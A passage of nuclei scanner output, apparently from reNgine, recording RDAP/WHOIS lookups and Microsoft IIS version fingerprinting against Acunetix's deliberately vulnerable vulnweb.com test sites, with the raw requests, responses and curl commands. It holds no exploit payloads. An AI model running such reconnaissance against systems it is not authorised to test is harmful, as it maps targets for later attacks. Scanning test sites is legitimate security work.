S.A.\\\"]]],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"roles\\\":[\\\"abuse\\\"],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"\\\"],[\\\"tel\\\",{\\\"type\\\":\\\"voice\\\"},\\\"uri\\\",\\\"tel:+352.27220150\\\"],[\\\"email\\\",{},\\\"text\\\",\\\"legalservices@eurodns.com\\\"]]]}]}],\\\"events\\\":[{\\\"eventAction\\\":\\\"registration\\\",\\\"eventDate\\\":\\\"2010-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"expiration\\\",\\\"eventDate\\\":\\\"2025-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"last changed\\\",\\\"eventDate\\\":\\\"2023-05-26T07:56:15Z\\\"},{\\\"eventAction\\\":\\\"last update of RDAP database\\\",\\\"eventDate\\\":\\\"2024-11-13T02:43:30Z\\\"}],\\\"secureDNS\\\":{\\\"delegationSigned\\\":false},\\\"nameservers\\\":[{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS1.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS2.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS3.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS4.EURODNS.COM\\\"}],\\\"rdapConformance\\\":[\\\"rdap_level_0\\\",\\\"icann_rdap_technical_implementation_guide_0\\\",\\\"icann_rdap_response_profile_0\\\"],\\\"notices\\\":[{\\\"title\\\":\\\"Terms of Use\\\",\\\"description\\\":[\\\"Service subject to Terms of Use.\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/www.verisign.com\\\\/domain-names\\\\/registration-data-access-protocol\\\\/terms-service\\\\/index.xhtml\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"Status Codes\\\",\\\"description\\\":[\\\"For more information on domain status codes, please visit https:\\\\/\\\\/icann.org\\\\/epp\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/epp\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"RDDS Inaccuracy Complaint Form\\\",\\\"description\\\":[\\\"URL of the ICANN RDDS Inaccuracy Complaint Form: https:\\\\/\\\\/icann.org\\\\/wicf\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/wicf\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]}]}\",\"ip\":\"64.176.191.126\",\"timestamp\":\"2024-11-13T02:43:46.423794538Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' 'https://www.rdap.net/domain/vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/rdap-whois.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/rdap-whois\",\"template-id\":\"rdap-whois\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/rdap-whois.yaml\",\"info\":{\"name\":\"RDAP WHOIS\",\"author\":[\"ricardomaia\",\"sttlr\"],\"tags\":[\"miscellaneous\",\"whois\",\"rdap\",\"osint\",\"misc\"],\"description\":\"RDAP (Registration Data Access Protocol) is a standard defined by the IETF to replace the whois protocol\\nin queries for information about Internet resource records such as domain names, IP addresses, and ASNs.\\n\",\"reference\":[\"https://about.rdap.org/\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"}},\"extractor-name\":\"lastChangeDate\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"https://rdap.verisign.com/com/v1/domain/vulnweb.com\",\"extracted-results\":[\"2023-05-26T07:56:15Z\"],\"request\":\"GET /domain/vulnweb.com HTTP/1.1\\r\\nHost: www.rdap.net\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nContent-Length: 2276\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: application/rdap+json\\r\\nStrict-Transport-Security: max-age=15768000; includeSubDomains; preload\\r\\n\\r\\n{\\\"objectClassName\\\":\\\"domain\\\",\\\"handle\\\":\\\"1602006391_DOMAIN_COM-VRSN\\\",\\\"ldhName\\\":\\\"VULNWEB.COM\\\",\\\"links\\\":[{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"self\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"},{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"related\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"}],\\\"status\\\":[\\\"client transfer prohibited\\\"],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"handle\\\":\\\"1052\\\",\\\"roles\\\":[\\\"registrar\\\"],\\\"publicIds\\\":[{\\\"type\\\":\\\"IANA Registrar ID\\\",\\\"identifier\\\":\\\"1052\\\"}],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"EuroDNS S.A.\\\"]]],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"roles\\\":[\\\"abuse\\\"],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"\\\"],[\\\"tel\\\",{\\\"type\\\":\\\"voice\\\"},\\\"uri\\\",\\\"tel:+352.27220150\\\"],[\\\"email\\\",{},\\\"text\\\",\\\"legalservices@eurodns.com\\\"]]]}]}],\\\"events\\\":[{\\\"eventAction\\\":\\\"registration\\\",\\\"eventDate\\\":\\\"2010-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"expiration\\\",\\\"eventDate\\\":\\\"2025-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"last changed\\\",\\\"eventDate\\\":\\\"2023-05-26T07:56:15Z\\\"},{\\\"eventAction\\\":\\\"last update of RDAP database\\\",\\\"eventDate\\\":\\\"2024-11-13T02:43:30Z\\\"}],\\\"secureDNS\\\":{\\\"delegationSigned\\\":false},\\\"nameservers\\\":[{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS1.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS2.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS3.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS4.EURODNS.COM\\\"}],\\\"rdapConformance\\\":[\\\"rdap_level_0\\\",\\\"icann_rdap_technical_implementation_guide_0\\\",\\\"icann_rdap_response_profile_0\\\"],\\\"notices\\\":[{\\\"title\\\":\\\"Terms of Use\\\",\\\"description\\\":[\\\"Service subject to Terms of Use.\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/www.verisign.com\\\\/domain-names\\\\/registration-data-access-protocol\\\\/terms-service\\\\/index.xhtml\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"Status Codes\\\",\\\"description\\\":[\\\"For more information on domain status codes, please visit https:\\\\/\\\\/icann.org\\\\/epp\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/epp\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"RDDS Inaccuracy Complaint Form\\\",\\\"description\\\":[\\\"URL of the ICANN RDDS Inaccuracy Complaint Form: https:\\\\/\\\\/icann.org\\\\/wicf\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/wicf\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]}]}\",\"ip\":\"64.176.191.126\",\"timestamp\":\"2024-11-13T02:43:46.423818714Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' 'https://www.rdap.net/domain/vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/rdap-whois.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/rdap-whois\",\"template-id\":\"rdap-whois\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/rdap-whois.yaml\",\"info\":{\"name\":\"RDAP WHOIS\",\"author\":[\"ricardomaia\",\"sttlr\"],\"tags\":[\"miscellaneous\",\"whois\",\"rdap\",\"osint\",\"misc\"],\"description\":\"RDAP (Registration Data Access Protocol) is a standard defined by the IETF to replace the whois protocol\\nin queries for information about Internet resource records such as domain names, IP addresses, and ASNs.\\n\",\"reference\":[\"https://about.rdap.org/\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"}},\"extractor-name\":\"expirationDate\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"https://rdap.verisign.com/com/v1/domain/vulnweb.com\",\"extracted-results\":[\"2025-06-14T07:50:29Z\"],\"request\":\"GET /domain/vulnweb.com HTTP/1.1\\r\\nHost: www.rdap.net\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nContent-Length: 2276\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: application/rdap+json\\r\\nStrict-Transport-Security: max-age=15768000; includeSubDomains; preload\\r\\n\\r\\n{\\\"objectClassName\\\":\\\"domain\\\",\\\"handle\\\":\\\"1602006391_DOMAIN_COM-VRSN\\\",\\\"ldhName\\\":\\\"VULNWEB.COM\\\",\\\"links\\\":[{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"self\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"},{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"related\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"}],\\\"status\\\":[\\\"client transfer prohibited\\\"],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"handle\\\":\\\"1052\\\",\\\"roles\\\":[\\\"registrar\\\"],\\\"publicIds\\\":[{\\\"type\\\":\\\"IANA Registrar ID\\\",\\\"identifier\\\":\\\"1052\\\"}],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"EuroDNS S.A.\\\"]]],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"roles\\\":[\\\"abuse\\\"],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"\\\"],[\\\"tel\\\",{\\\"type\\\":\\\"voice\\\"},\\\"uri\\\",\\\"tel:+352.27220150\\\"],[\\\"email\\\",{},\\\"text\\\",\\\"legalservices@eurodns.com\\\"]]]}]}],\\\"events\\\":[{\\\"eventAction\\\":\\\"registration\\\",\\\"eventDate\\\":\\\"2010-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"expiration\\\",\\\"eventDate\\\":\\\"2025-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"last changed\\\",\\\"eventDate\\\":\\\"2023-05-26T07:56:15Z\\\"},{\\\"eventAction\\\":\\\"last update of RDAP database\\\",\\\"eventDate\\\":\\\"2024-11-13T02:43:30Z\\\"}],\\\"secureDNS\\\":{\\\"delegationSigned\\\":false},\\\"nameservers\\\":[{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS1.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS2.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS3.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS4.EURODNS.COM\\\"}],\\\"rdapConformance\\\":[\\\"rdap_level_0\\\",\\\"icann_rdap_technical_implementation_guide_0\\\",\\\"icann_rdap_response_profile_0\\\"],\\\"notices\\\":[{\\\"title\\\":\\\"Terms of Use\\\",\\\"description\\\":[\\\"Service subject to Terms of Use.\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/www.verisign.com\\\\/domain-names\\\\/registration-data-access-protocol\\\\/terms-service\\\\/index.xhtml\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"Status Codes\\\",\\\"description\\\":[\\\"For more information on domain status codes, please visit https:\\\\/\\\\/icann.org\\\\/epp\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/epp\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"RDDS Inaccuracy Complaint Form\\\",\\\"description\\\":[\\\"URL of the ICANN RDDS Inaccuracy Complaint Form: https:\\\\/\\\\/icann.org\\\\/wicf\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/wicf\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]}]}\",\"ip\":\"64.176.191.126\",\"timestamp\":\"2024-11-13T02:43:46.423840605Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' 'https://www.rdap.net/domain/vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/microsoft/microsoft-iis-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/microsoft-iis-version\",\"template-id\":\"microsoft-iis-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/microsoft/microsoft-iis-version.yaml\",\"info\":{\"name\":\"Microsoft IIS version detect\",\"author\":[\"wlayzz\"],\"tags\":[\"tech\",\"microsoft\",\"iis\"],\"description\":\"Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"extracted-results\":[\"Microsoft-IIS/8.5\"],\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.175 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:44:06 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:44:10.508320105Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.175 Safari/537.36' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/microsoft/microsoft-iis-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/microsoft-iis-version\",\"template-id\":\"microsoft-iis-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/microsoft/microsoft-iis-version.yaml\",\"info\":{\"name\":\"Microsoft IIS version detect\",\"author\":[\"wlayzz\"],\"tags\":[\"tech\",\"microsoft\",\"iis\"],\"description\":\"Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"extracted-results\":[\"Microsoft-IIS/8.5\"],\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 maglev/24074.2321.2810.3500/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:44:06 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LLBCLMIBIMDBJCBNKNAGNGDG; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:44:10.517510986Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 maglev/24074.2321.2810.3500/49' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/microsoft/microsoft-iis-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/microsoft-iis-version\",\"template-id\":\"microsoft-iis-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/microsoft/microsoft-iis-version.yaml\",\"info\":{\"name\":\"Microsoft IIS version detect\",\"author\":[\"wlayzz\"],\"tags\":[\"tech\",\"microsoft\",\"iis\"],\"description\":\"Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your 